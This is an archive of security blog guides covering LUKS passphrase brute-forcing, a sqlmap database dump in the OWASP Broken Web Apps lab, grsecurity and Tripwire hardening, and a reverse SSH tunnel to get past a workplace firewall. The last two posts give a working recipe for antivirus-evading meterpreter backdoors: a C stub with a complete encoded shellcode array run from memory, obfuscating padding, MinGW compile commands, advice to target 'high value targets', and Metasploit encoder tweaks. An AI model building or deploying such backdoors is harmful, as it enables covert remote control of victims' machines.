Archive for the ‘Guides’ Category

Well, as you might have noticed (and some of you knew) I haven’t been updating auditme or my blog or well much of anything else. Quite simply this was because I locked away most of my data (including auditme) in a LUKS encrypted drive… I know… I’m smart huh?

Incidentally if you have a server with pretty decent uptime you might well forget that LUKS passphrase you’ve probably only used one time when you configured it 😛

So instead of giving up all my data to the encryption gods I decided that I would brute force the pass phrase. This generally speaking is utterly pointless with LUKS full drive encryption. However, in this case I knew all the characters in the passphrase however I did not know the order I had put them in. (This is usually how it works for most people).

In my particular case the passphrase was in the format of !word1@word2*word3& etc… So I created a simple program to brute force the passphrase, and voila I recovered it, along with the rest of my data. I decided since this is quite a common occurence (at least so it would seem on Ubuntu forums) that I would post the utility that I used to do this so that everyone in a similar situation may use it.

Note : This really is only effective if you KNOW some or all of the passphrase, this is not a good idea if you’ve stolen a computer and have NO clue what the passphrase is, so if you happen to be one of those law enforcement types that thinks this is a cool way to break crypto, it’s not it’s slow and inefficient.

Using the utility

Using this application is pretty straight forward. The first thing you will need to do is pull the drive and place it in another system, barring that you can boot from a liveCD (I used Fedora because I had one handy, but Ubuntu will work fine as well.)

Then simply grab the files from moi.

wget http://dangertux.no-ip.org/downloads/luksbrute.tar.gz

Extract them

tar xzvf luksbrute.tar.gz

Note : you may need to make the following files executable.

chmod 755 lukscrack.py
chmod 755 luksbrute

Then create a file full of words you wish to use the permutations of. For instance if you knew you used the special characters ! , @ and # and the words , word1 word2 and word3 the file would look like this.

!
@
#
word1
word2
word3

So now let’s assume your password was in the format !word1@word2#word3 that’s 6 elements that we want permutations of, so we can have lukscrack.py generate our wordlist for us (if you already have a wordlist you’d like to use I’ll explain how to do that in a second.

So we would run

./lukscrack.py -g /path/to/permutation/list -m 6

and it will generate your wordlist and begin cracking with that wordlist.

If you want to use a wordlist you’ve already generated you can simply do the following

./lukscrack.py -w /path/to/my/wordlist

Hopefully this helps someone , it was rather useful to me. 🙂

So, my wordpress analytics tell me that you guys are looking for a “how to pwn with sqlmap ubuntu” article. No seriously, that was someone’s search term. I’m hesitant to do this, but I figure with everything else I post it’s not the worst thing I could do. Cue the song “There Are Worse Things I Could Do” from Grease.

So here we go, we’re using a “live web app” with a known vulnerability for this exercise. The webapp is available in the OWASP Broken Web Apps virtual machine for those that want to follow along.

For this you will need sqlmap which if you’re using Back Track 5 as I have in this guide is already included. If you’re not you can get it here : http://sqlmap.sourceforge.net/

There are also a few other tools to do this for you like sqlsus. They all pretty much do the same thing.

So real quick, before we start there are two things you need to realize.

  • 1 – doing this to a database/webapp that you don’t have permission to do it to is illegal.
  • 2 – SQLmap performs blind sql injection. Thus it may not detect all vulnerabilities, and likely will take longer to enumerate the actual injection than is actually needed, thus I recommend performing non blind sqli manually to save yourself time.

Okay so now that we have that stuff out of the way and should have sqlmap installed by now (if you don’t know how to install it you really don’t need to be using it.) we can begin.

Vulnerable Web App

In the WordPress Spreadsheet plugin there is a SQL injection vulnerablity in the ss_functions.php that is called in ss_load.php.

The vulnerable code can be seen here :

if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {

Now that we have our vulnerable bit of code we can use SQLmap to exploit it.

SQLMap

SQLmap is an extremely powerful tool that gives you a LOT of control over how deep you get into exploiting the database. You can simply use it to confirm a vulnerability and it will give you a valid injection string to manually confirm, or you can go all the way to a full dump and sometimes (if the dbms is configured poorly gain a remote interactive sql shell/os shell).

Getting an Injection String

If you simply want to determine that the injection vector exists we can run sqlmap as follows

./sqlmap.py -u http://atfieldsandotherstuff.com/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1

Note : I’ve just added an entry in my hosts file to create the domain, an ip will work fine in place of this.

We discover shortly after running the command that parameter ss_id is in fact injectable, and are given the option to continue testing other parameters, you may wish to do this, however for this guide there is no point so I won’t. So we hit N. (which is the default)

As you can see we are presented with a list of three injections that we can use to verify our vulnerability.

And we can confirm that the paramater is in fact injectable.

Database Dumping

The ever popular thing to do with SQLi is “dumping the database”. This is usually how your passwords end up on pastebin, and it’s rather trivial to do it with sqlmap.

You have two options for this dump and dump-all. Dump-all will dump ALL the DBMS database tables where as dump will only dump the active dbms database tables.

Note : If the database user for the vulnerable web app is not dba there is no difference between the two options.

So we’re going to go with a dump since this user is not the dba. (a quick way to find out is using the enumerate-privileges switch with sqlmap.)

./sqlmap.py –dump -u  http://atfieldsandotherstuff.com/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1

After awhile you will be presented with a nice dump of your database, which sqlmap conveniently stores for you. If sqlmap detects hashed strings in the database it will also attempt to crack them for you. This can take a long time, so it may be best to just dump them hashed and crack them off site on a system that is built for hash-cracking (oclhashcat comes to mind).

Other features you might find interesting

Additionally sqlmap comes with a few options to “take over” a dbms. These do not work in all cases, and usually rely on weak configurations where the user who owns the vulnerable database happens to be the dba. These options are.

  • –os-cmd=OSCMD Execute an operating system command
  • –os-shell Prompt for an interactive operating system shell
  • –os-pwn Prompt for an out-of-band shell, meterpreter or VNC
  • –os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
  • –os-bof Stored procedure buffer overflow exploitation
  • –priv-esc Database process’ user privilege escalation

By default the OWASPBWA virtual machine is not configured to allow this, however it would be trivial to grant the owner of the vulnerable database the privileges to utilize these vectors if you’re bored. Keep in mind if you prompt for an out of band meterpreter shell you have to have the Metasploit Framework installed.

There you have it, despite the fact that I will probably regret doing this and get a ton of questions asking how to find vulnerable webapps that’s the basics of using sqlmap for automated blind sqli.

Have fun! 😉

This past week I had a very stimulating discussion with a very talented co-worker of mine. This discussion was about Exec-Shield (DEP for all my Windows fans) and ASLR under RedHat. Through the course of this discussion, we discovered a very interesting script that helped us detect which of our running processes were protected by exec-shield as well as some nifty kernel tunables for exec-shield, and ASLR. Incidentally, he wrote a very informative article about it over at prefetch.net, you should check it out. Also he has a lot of other great nix sysadmin stuff there that is definitely worth your time.

Now you’re probably thinking. Hey DT what’s this got to do with Ubuntu, you’re talking about RedHat, what’s with the sensational title?

To that, I say. “Dear reader, you catch on fast. It has absolutely NOTHING to do with Ubuntu.” Therein lies our problem, for a server OS that Canonical touts as production ready with nifty slogans like “We are cloud.” I was somewhat astonished to find that exec-shield support in Ubuntu is rather limited (read nonexistant).

What is this exec-shield and why do I want it?

Exec-Shield also referred to as NX bit and DEP is a system designed for 64 Bit PAE (Physical Address Extension) systems to divide executable code into two sections, a .data section and the actual executable instructions. Basically this helps you mitigate stack, heap and int based overflows by mitigating the executability (is that a word?) of injected shell code. The overflow will still happen, however no payload execution happens. This is obviously a nice thing to have happening.

How do I know it’s enabled?

Well quite simply on a RHEL/CentOS/FC box if you do the following

sudo sysctl kernel.exec-shield

You will get some output that signifies what setting you have for exec-shield. Default is 1

kernel.exec-shield = 1

It should look like that. Really quick, a rundown on the possible values.

  • 0 – Disabled, regardless of whether the application is compiled to support it.
  • 1 – Enabled if the application is compiled to support it.
  • 2 – Enabled for all applications unless they are compiled without it.
  • 3 – Enabled regardless of what the application is compiled to support.

But what about Ubuntu? If you were following along with Ubuntu you likely got an error when you typed that command. Why is that you ask? Quite simply, your kernel does not support Exec-Shield.

Time to switch to RHEL?

Ideally, for production systems yes, for many reasons not just this, but it’s expensive (CentOS isn’t ;-)). That being said you know I love Ubuntu. So, I have an alternative solution for you.

Emulating Exec-Shield on Ubuntu

There are a couple of things to understand here before we start. Debian upstream and thus Ubuntu removed the exec-shield patch from the distribution a few years ago, claiming it was replaced by gcc’s compile time optimizations. There is a major flaw in this logic, these enforcements are made at the application level, which is a terrible place to have them made. The kernel level is much more suitable for this type of control. Incidentally, the two work wonderfully together.

We do not have access to exec-shield, however we can emulate it through grsec, which is exactly what we are going to be doing here.

Note : this involves recompiling your kernel, so breakage could ensue.

Note+ : You will also need build essential for this

sudo apt-get install build essential

Note++ : For make menuconfig we’ll also need ncurses-dev.

sudo apt-get install libncurses5-dev

Step 1 : Downloading grsec

The first step is to obtain the latest stable release of grsec.

wget http://grsecurity.net/stable/grsecurity-2.2.2-2.6.32.53-201201101724.patch

Step 2 : Downloading Kernel Source

Next we need the kernel source, this has to be done with an unpatched kernel so we can not use our existing kernel source.

wget http://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.32/linux-2.6.32.54.tar.gz

Once it’s downloaded extract your kernel source

tar xzvf linux-2.6.32.54.tar.gz

Step 3 : Patching the kernel

Now we’ll patch our kernel source.

cd linux-2.6.32.54
sudo su -
patch -p1 < ../grsecurity-2.2.2-2.6.32.53-201201101724.patch

Step 4 : Configuring our patched Kernel

Now we run

make menuconfig

Most of the defaults are acceptable however we need to look at our “Security” Options

 

 

 

 

 

 

 

The first thing we’ll look at is GRSecurity. There are a variety of options in here. You will need to explore the ones that fit your needs best. However I recommend enabling the following

  • Security Level High
  • Hide /proc from users
  • Sysctl Support On
  • Enable Features by default On

There are many more tunables that you can fiddle with here.

There are also quite a few tunables under PaX that can be adjusted here however, the defaults are quite acceptable.

 

 

 

 

 

 

 

Once you’re done making changes we’re ready to compile the kernel.

Step 5 : Compiling our Grsecurity Kernel

For non-Ubuntu distros (since this has been pretty generic up until this point) we can simply

make

Alternatively for Ubuntu users we can build our kernel in the Debian method by doing the following.

make-kpkg clean
sed -rie 's/echo "\+"/#echo "\+"/' scripts/setlocalversion
rm localversion-grsec
fakeroot make-kpkg --initrd kernel_image kernel_headers

Note : If you follow this step you may simply use dpkg -i to install your new kernel. Users following the other method should update their grub config and install the kernel in the normal method.

After Kernel Installation

Once we have our GRSecurity enabled kernel installed we can use the gradmn tool to put GRSecurity in learning mode and create a policy which will be enforced.
You can learn more about doing that here.
Once you have done this your Ubuntu server will be much more ready for production usage. Though…Installing CentOS takes far less time 😉

By request, and because I haven’t posted on here in a while here’s a quickie for Tripwire on Ubuntu. This is done using 11.10 but should work on nearly any version of Ubuntu >= 10.04. It’s important to know two things ahead of time with Tripwire. One , it’s extremely high maintenance compared to other host based intrusion detection systems. Two, it depends on a known good configuration at install time. So if you feel your system is already compromised it’s wise to start off with a fresh install prior to doing this.

Step 1 : Install Tripwire

To install Tripwire, simply do the following in a terminal.

sudo apt-get update && sudo apt-get install tripwire

Step 2 : Configure Postfix

After Tripwire is installed, you will be prompted to configure Postfix. Choose local only configuration for Postfix unless you are using some external monitoring service like Satellite or Space Walk. You may accept the rest of the default options presented to you up until you reach the part of “Twipwire Configuration” Displayed below.

Super ominous warning. If you heed it go to step 3, if you say yes proceed to step 5.

You will be prompted with a warning that the debian install process sucks, and if you have your site key and configuration policy publicly exposed for a period of approximately 1.3 seconds. If this is unacceptable to you follow the alternate instructions in Step 3 below. Otherwise choose yes.

Step 3 : Configuring Site Key and Configuration Policy

First we must create our sitekey we may do so by running the following command in a terminal

twadmin -m G --site-keyfile site.key

You will be prompted for a passphrase, create a strong one and remember it.

Then we must create a local keyfile which may be done by doing the following

twadmin -m G --local-keyfile local.key

You will again be asked for a passphrase. Create a new one for the local keyfile.

Step 4 : Generate your Configuration Files

Now we need to generate our config files, we will do so by doing the following

sudo cp *.key /etc/tripwire
sudo twadmin --create-cfgfile -S site.key /etc/tripwire/twcfg.txt
sudo twadmin --create-polfile -S local.key /etc/tripwire/twpol.txt
sudo rm /etc/tripwire/twpol.txt /etc/tripwire/twcfg.txt

* You will be prompted for your passphrase for each keyfile in this step you must provide it correctly to continue. Also, do not perform the last line until you have confirmed that the above steps were successful.

Step 5 : Creating the Baseline for Tripwire

Now we simply need to run the command to baseline our system which is below.

sudo tripwire --init

and any time you want to compare the current status of the system to the baseline database you need to run

sudo tripwire --check

Enjoy 😉

Okay, well I know it’s been entirely too long since I’ve written anything here, and for those of you who know me personally you know I’ve had a very hectic schedule of late. Sorry for the delay in posting, also the Ubuntu 12.04 LTS desktop and server security guides have been delayed. I’m hoping to have at least one of them up after the holidays, but no promises.

So to tithe you over for a little bit, and to get a new post up here, I’m going to discuss something that a lot of people ask about on Ubuntu Forums. It is against Ubuntu forums policy to instruct people how to bypass the security of a network they do not own. This however, is my personal blog and I will instruct whatever I want 😛 That being said, if you do this at work and get fired it’s your fault, most sysadmins will frown on this, and yes they will catch you.

This is not really a new trick, but it will bypass NAT and allow you to have an always on SSH connection to an endpoint behind a NAT router (with no ports forwarded).

This requires three systems. The endpoint (which is behind the firewall), the middleman, which is a machine you control somewhere on the internet, and the machine you want to ssh from (presumably your home machine or another system that you control).

Note : For the purposes of this guide the following IP’s are used as a point of reference.

Middleman : 192.168.0.15
Endpoint Behind Firewall : 172.16.128.4
Machine that you’re SSH’ing from : 192.168.0.14

So here we go.

Setting up the Middle Man

First things first, we need to install to install an openssh-server on our middleman and configure it as a gateway.

Note : This is done on Ubuntu, change commands appropriately for your operating environment.

sudo apt-get install openssh-server

Now we want to edit /etc/ssh/sshd_config and add the following lines.

GatewayPorts Yes
TCPKeepAlive Yes

This will keep our connections alive and allow us to tunnel through this system.

Creating a Reverse Connection From the Endpoint

Now on the endpoint machine (the one behind the firewall) we will create a reverse connection to our middleman server. This will bypass our firewall. We can automate this process by creating a cron job. However, if we do this we must use passwordless login with keys. I’m lazy so I didn’t generate keys here.

ssh -R 31337:localhost:22 dangertux@192.168.0.15

What this does is create a reverse connection and tunnel to 192.168.0.15

Connect From Your Machine

Now we connect to the middleman server from our machine.

ssh -p 31337 dangertux@192.168.0.15

Note: the password you are prompted for will be the password of the user on the machine behind the firewall.

There you go, an always on SSH client – client connection that bypasses NAT routing. Again, a friendly warning, a sysop will not take DT told me to as an excuse, besides I didn’t tell you to, I told you how 😉

In a previous article I discussed using SET and shellcodeexec to create basic backdoored executable files with the meterpreter reverse shell to bypass Anti-Virus on Windows. I have received several comments and emails regarding this method not working for individuals despite it being undetectable by AV. I will now show you another method of creating a custom EXE stub to bypass AV.

It’s important to note that once you run this in Virus total it’s going to get detected, so you need to randomize your EXE stub template as much as possible. Also use this on high value targets only as each payload will have maybe a 24-48 hour lifespan on a production network before AV is picking it up.

Please Note : This is not my creation, this concept has been discussed and demonstrated about a million times by people far more intelligent than myself. So if you feel like I’m stealing your idea, I’m sorry it was a good idea 😛

Creating The Executable Skeleton

We’ll create a basic framework for our executable here this will be a simple C skeleton it will look like this.


#include
//make sure you modify this skeleton padding payload
etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=

;
//meterpreter payload goes here
unsigned char payload[]=

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

We will call this meterpreter.c for giggles.

Generating our Payload

First thing we'll do is generate our payload and encode it. Remember encoding does little in terms of AV, it gives us some benefit, however it will do more for us in terms of bypassing IDS.

 

 

 

 

After this place our payload in our meterpreter.c file and it should look like so...


#include
//make sure you modify this skeleton padding payload etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=

;
//meterpreter payload goes here
unsigned char payload[]=
"\xb9\x8a\x02\x00\x00\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xb8\x7a\x01\x04\x05\xee\xf8\xf7\xf6\xf5"
"\xca\x52\x3d\x42\x01\x17\xf3\xe8\xab\x70\x14\x12\x12\xf6"
"\xe1\xed\xed\xe9\xd7\x4c\x22\x62\x20\x35\xd0\xcc\x8e\x64"
"\x33\x3a\x3b\xdc\xca\xc1\xc0\xc7\xf8\x7c\x13\x50\x13\x01"
"\xe5\xfa\xb9\x4a\x0a\x00\x00\xe0\xf7\xff\xff\x87\xb9\x3e"
"\x50\x14\x56\x47\xa2\xb2\xf0\x72\x41\x4c\x4d\xae\xb8\xaf"
"\xae\xd5\xea\x6a\x05\x42\x01\x1f\xfb\xe8\xab\x00\x1c\x12"
"\x12\xce\xd9\xcd\xcd\xb1\x8f\x0c\x62\x2a\x68\x75\x90\x84"
"\xc6\x7c\x73\x62\x63\xbc\xaa\xb9\xb8\xc7\xf8\x74\x1b\x50"
"\x13\x09\xed\xfa\xb9\x0a\xf1\xe0\xe0\x38\x2f\x3f\x3f\x4f"
"\x71\xfe\x90\xdc\x9e\x87\x62\x6a\x28\x8a\x62\x74\x75\xae"
"\xb8\xa7\xa6\xd5\xea\x62\x0d\x42\x01\x27\xc3\xc8\xce\x7d"
"\xb4\x4e\x72\x4c\x05\xfe\xac\xd0\xb7\x8c\x3f\xbf\x7d\x17"
"\x52\xf3\x71\xb1\x9a\x81\x91\xad\xad\xc8\x61\x12\x59\xc4"
"\x66\xb8\x12\x7a\xa9\x6f\x35\xc3\xa0\x4f\xa0\x2b\xe2\x64"
"\x4c\x3b\x96\x95\x8d\x6c\xab\x45\x19\x5b\x25\x86\x87\x88"
"\x44\x5e\xa2\x88\xf3\xde\x6d\x22\x71\x41\x91\xac\xae\xf7"
"\xde\x82\xaa\xc0\x79\xaa\xa3\x71\xb6\x1b\xbb\x2e\xd1\xea"
"\x4e\x74\x26\xe5\xd9\xf7\x42\x4d\x82\x82\xe3\x81\xe2\xfc"
"\xe3\x1a\xa3\xd8\x0a\x62\xa1\x1f\x74\x94\x05\x3e\xa3\x5b"
"\x90\xd5\xcf\xc6\x71\xd3\xf0\x9f\x60\x63\x87\x77\x65\x5c"
"\x68\x51\x48\xef\xee\x3d\xb4\xb0\x2c\x95\x29\x60\xad\xff"
"\x22\xb9\x61\x7d\x8d\x5d\xaf\x7b\x54\x03\x16\xce\xc5\x6a"
"\x28\x9b\xfe\xa2\xb2\xfd\x31\x88\x7e\xd3\x68\xf0\xd4\x97"
"\x8d\x45\xf9\x20\x62\x14\xbf\x90\x17\xa1\x4d\x85\x5f\x0e"
"\x49\x04\x51\xc6\x10\x9e\x4f\x22\xd9\x0f\xc3\xc0\xa3\xd3"
"\xa4\x5a\x51\xe3\x97\xe6\x1e\xcb\x4a\x5d\x26\xdc\xcf\xc3"
"\x28\x09\x8c\xb5\x26\x0f\xb7\x62\x18\xe6\x24\x56\x1a\xfd"
"\x91\x77\x22\x90\xe6\xaa\x4b\x0e\x55\x8c\xc9\x17\x2f\x25"
"\x49\x31\x0a\x2d\x0b\x82\x6e\x99\x8f\xe4\xd2\x20\x28\xce"
"\xd8\x68\x35\x85\xb4\x95\xfb\xf7\x8d\x57\xea\x09\x0b\xbb"
"\xa6\x3b\x03\xb5\xf4\x49\x8b\xf4\x5e\x9e\x2e\x11\x83\xaa"
"\x22\x89\xc4\xdb\xfc\xa6\x65\xd4\x35\x88\x35\x84\x6d\xb1"
"\xe2\x7e\x88\xd2\xc6\xc5\xef\x67\x50\x35\x81\x11\x29\xff"
"\x27\x85\xc6\x7e\xc7\xc7\x2c\x5c\x14\xeb\x7b\xda\xac\x54"
"\x04\xdc\x4e\xf5\xfd\x6b\x7d\xcb\x10\x81\xde\x38\xdb\x54"
"\x4a\xf0\x0b\x5e\xbf\x9c\x8c\x6b\x91\xfb\xa8\x42\x22\x96"
"\xaa\xf5\x33\xce\xa6\x68\x04\xbe\x01\xba\xd2\x94\x24\xa5"
"\x7f\x2b\x2c\x4f\x1c\xcd\x33\x88\x83\x07\xd8\x9c\x7e\xe8"
"\x1a\x40\x79\x86\xc5\x19\x93\x0f\x4f\x86\x31\x2c\xcd\xf4"
"\x7c\xad\x28\xcb\x1c\xb5\x46\x33\x8c\xca\xe0\x85\x07\x1b"
"\x57\x11\xe2\x2b\x48\x2f\x13\x2b\xa7\x72\xb4\x02\x26\x69"
"\xbf\x92\x83\x1d\x76\xe8\x11\xcb\xc2\x76\x48\x1f\x22\xfb"
"\xbd\x8b\xc5\x0a\x77\x0a\xd9\x23\xcd\x8a\x38\x5e\x9d\x06"
"\x95\x57\x52\x29\xa5\x69\x30\x0e\x42\x88\x07\x85\x3e\xe1"
"\xf2\xf7\xed\xcc\xa2\xea\x31\x6e\x09\xdf\x6f\x0c\x5b\xc4"
"\x30\xb0\xd6\xdd\xc9\x91\x94\x4d\xbe\xf1\xf4"

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

Insert Random Padding

Now that we've gotten our payload inserted, let's place our random padding in. You can do this through any method. I like to do the following

cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c512 > /root/random

Change the regex on tr to whatever you need and change the count on head to as many characters as you want to use to pad.


#include
//make sure you modify this skeleton padding payload etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=
"cb1BB4YuXguEasx-EPPgGW9XCbgNzUub8pMFMo8IJJrgdHvKE_ywAaXhIT9ZCQ7nkwEsfyP0qRIADUORefB1y9uV0WfxJH0FWkP9y2QD3hZfYDBzcLP-sbHrdzeb9nOlhht5mj5uYsLfv2-wsXIyJ6uXWc-mQyVxyU2TULTF10I4-c545F1EVU1D_paZXshUOYAi6kpDSLIkrfj_xZW-oeqWlcoEQuBE2ZkMnTm7zHoPrpy0qt9Ikgq-p3eGS1sWz4O7D17ujwjB-i9MVk2R6J13vaa0KQ0AN_PxPT6mMbChi82FjgbNuVfHUtfH6n1Om7oHdrDCaBxxZnSYl4VutSY16K0gfpioZtLC98uj3JqQCbA7BUd7L2bEWlmJV-O1erv6bUx_YtxB6RJNdN5eTdsd3Ansd0xx_sCGZMXOtFG4VhWeOODQ8zWY5vgmobrBeaCO_HAUyvpzy81VDaYX5sHoYo8dagKhGPp4GjfaLpPRliynosv0vAHsdp3icE2X"
;
//meterpreter payload goes here
unsigned char payload[]=
"\xb9\x8a\x02\x00\x00\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xb8\x7a\x01\x04\x05\xee\xf8\xf7\xf6\xf5"
"\xca\x52\x3d\x42\x01\x17\xf3\xe8\xab\x70\x14\x12\x12\xf6"
"\xe1\xed\xed\xe9\xd7\x4c\x22\x62\x20\x35\xd0\xcc\x8e\x64"
"\x33\x3a\x3b\xdc\xca\xc1\xc0\xc7\xf8\x7c\x13\x50\x13\x01"
"\xe5\xfa\xb9\x4a\x0a\x00\x00\xe0\xf7\xff\xff\x87\xb9\x3e"
"\x50\x14\x56\x47\xa2\xb2\xf0\x72\x41\x4c\x4d\xae\xb8\xaf"
"\xae\xd5\xea\x6a\x05\x42\x01\x1f\xfb\xe8\xab\x00\x1c\x12"
"\x12\xce\xd9\xcd\xcd\xb1\x8f\x0c\x62\x2a\x68\x75\x90\x84"
"\xc6\x7c\x73\x62\x63\xbc\xaa\xb9\xb8\xc7\xf8\x74\x1b\x50"
"\x13\x09\xed\xfa\xb9\x0a\xf1\xe0\xe0\x38\x2f\x3f\x3f\x4f"
"\x71\xfe\x90\xdc\x9e\x87\x62\x6a\x28\x8a\x62\x74\x75\xae"
"\xb8\xa7\xa6\xd5\xea\x62\x0d\x42\x01\x27\xc3\xc8\xce\x7d"
"\xb4\x4e\x72\x4c\x05\xfe\xac\xd0\xb7\x8c\x3f\xbf\x7d\x17"
"\x52\xf3\x71\xb1\x9a\x81\x91\xad\xad\xc8\x61\x12\x59\xc4"
"\x66\xb8\x12\x7a\xa9\x6f\x35\xc3\xa0\x4f\xa0\x2b\xe2\x64"
"\x4c\x3b\x96\x95\x8d\x6c\xab\x45\x19\x5b\x25\x86\x87\x88"
"\x44\x5e\xa2\x88\xf3\xde\x6d\x22\x71\x41\x91\xac\xae\xf7"
"\xde\x82\xaa\xc0\x79\xaa\xa3\x71\xb6\x1b\xbb\x2e\xd1\xea"
"\x4e\x74\x26\xe5\xd9\xf7\x42\x4d\x82\x82\xe3\x81\xe2\xfc"
"\xe3\x1a\xa3\xd8\x0a\x62\xa1\x1f\x74\x94\x05\x3e\xa3\x5b"
"\x90\xd5\xcf\xc6\x71\xd3\xf0\x9f\x60\x63\x87\x77\x65\x5c"
"\x68\x51\x48\xef\xee\x3d\xb4\xb0\x2c\x95\x29\x60\xad\xff"
"\x22\xb9\x61\x7d\x8d\x5d\xaf\x7b\x54\x03\x16\xce\xc5\x6a"
"\x28\x9b\xfe\xa2\xb2\xfd\x31\x88\x7e\xd3\x68\xf0\xd4\x97"
"\x8d\x45\xf9\x20\x62\x14\xbf\x90\x17\xa1\x4d\x85\x5f\x0e"
"\x49\x04\x51\xc6\x10\x9e\x4f\x22\xd9\x0f\xc3\xc0\xa3\xd3"
"\xa4\x5a\x51\xe3\x97\xe6\x1e\xcb\x4a\x5d\x26\xdc\xcf\xc3"
"\x28\x09\x8c\xb5\x26\x0f\xb7\x62\x18\xe6\x24\x56\x1a\xfd"
"\x91\x77\x22\x90\xe6\xaa\x4b\x0e\x55\x8c\xc9\x17\x2f\x25"
"\x49\x31\x0a\x2d\x0b\x82\x6e\x99\x8f\xe4\xd2\x20\x28\xce"
"\xd8\x68\x35\x85\xb4\x95\xfb\xf7\x8d\x57\xea\x09\x0b\xbb"
"\xa6\x3b\x03\xb5\xf4\x49\x8b\xf4\x5e\x9e\x2e\x11\x83\xaa"
"\x22\x89\xc4\xdb\xfc\xa6\x65\xd4\x35\x88\x35\x84\x6d\xb1"
"\xe2\x7e\x88\xd2\xc6\xc5\xef\x67\x50\x35\x81\x11\x29\xff"
"\x27\x85\xc6\x7e\xc7\xc7\x2c\x5c\x14\xeb\x7b\xda\xac\x54"
"\x04\xdc\x4e\xf5\xfd\x6b\x7d\xcb\x10\x81\xde\x38\xdb\x54"
"\x4a\xf0\x0b\x5e\xbf\x9c\x8c\x6b\x91\xfb\xa8\x42\x22\x96"
"\xaa\xf5\x33\xce\xa6\x68\x04\xbe\x01\xba\xd2\x94\x24\xa5"
"\x7f\x2b\x2c\x4f\x1c\xcd\x33\x88\x83\x07\xd8\x9c\x7e\xe8"
"\x1a\x40\x79\x86\xc5\x19\x93\x0f\x4f\x86\x31\x2c\xcd\xf4"
"\x7c\xad\x28\xcb\x1c\xb5\x46\x33\x8c\xca\xe0\x85\x07\x1b"
"\x57\x11\xe2\x2b\x48\x2f\x13\x2b\xa7\x72\xb4\x02\x26\x69"
"\xbf\x92\x83\x1d\x76\xe8\x11\xcb\xc2\x76\x48\x1f\x22\xfb"
"\xbd\x8b\xc5\x0a\x77\x0a\xd9\x23\xcd\x8a\x38\x5e\x9d\x06"
"\x95\x57\x52\x29\xa5\x69\x30\x0e\x42\x88\x07\x85\x3e\xe1"
"\xf2\xf7\xed\xcc\xa2\xea\x31\x6e\x09\xdf\x6f\x0c\x5b\xc4"
"\x30\xb0\xd6\xdd\xc9\x91\x94\x4d\xbe\xf1\xf4"

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

Compile it

Now we simply compile it for Windows

/usr/bin/i686-mingw32msvc-gcc -Wall meterpreter.c -o meterpreter.exe

You'll probably get some warnings.

Now verify your shell

 

 

 

 

And check it on virus total. Report here

You should come up with less than 20% detection rate, with none of the major AV picking it up. If you're coming up higher than that you can add to your executable stub, and or try payloading an actual EXE template (don't do notepad.exe everyone does notepad). Also changing your payload for custom shellcode will give you a 0% detection rate most of the time.

If you're still getting picked up by AV you can try some hacks in

/opt/framework/msf3/lib/msf/core/exploit/exe.rb

I would suggest checking out this bit of code.

                # Copy the code to a new RWX segment to allow for self-modifying encoders
                payload = win32_rwx_exec(code)

Since most AV will trigger on the RWX push in the encoder. Modifying this and creating a custom encoder should allow you to bypass all current AV signatures. Note, that's a theory I haven't had to test it.

So... Yeah I'm not writing about Windows for a while anymore hope you guys enjoyed it 😉

WHAT!!!! WINDOWS!??!?!?! NO WAY DT!!! Yes way guys… Just this once, plus you can use this trick for Linux payloads too if you make a few changes to a python script 😉

Note : I know you can use shellcodeexec to execute payloads without SET, however SET automates the process quite nicely for you and it makes a nice addition to the Silly SET Tricks article collection. So please don’t fill up my comments box telling me I’m a moron, thank you 🙂

I actually wrote this because a good friend of mine Dan Dieterle over at Cyber Arms sent me an email regarding bypassing Windows AV with meterpreter. Windows AV is a lot tougher to tip toe around than Linux AV (because Linux AV sucks) so for all you nix guys you’re gonna have to sit this one out and go read one of the many things I’ve written about Linux in the past few weeks.

Creating our Payload with SET

First things first make sure SET is updated and you have it fired up. This is essentially going to be a set of Screen caps, not so much an article.

Choose 1 for Social Engineering Attacks

Choose 4 for Create Payload and Listener

Choose 13 For Shellcodeexec

Then configure the port of your listener and payload settings however you wish…

Configure payload as you see fit.

You can then set up the listener now , or start it later with Metasploit – just remember to set the options you set earlier in SET for the payload for multi/handler 😉

Note : don’t be an idiot like me, make sure your path is correct for UPX (although it won’t effect the outcome here).

Set up Payload

Your payload will be stored in the root directory of SET (/pentest/exploits/set on Back Track 5). We can go ahead and change our filename and make it executable (not needed for Windows Binaries)

mv /pentest/exploits/set/msf.exe  ~/badbadfile.exe

Then just get it onto the target system 😉

Confirm that it will bypass AV

Run it against virus-total and we’ll see surprisingly happy results 🙂

Virustotal report

Enjoy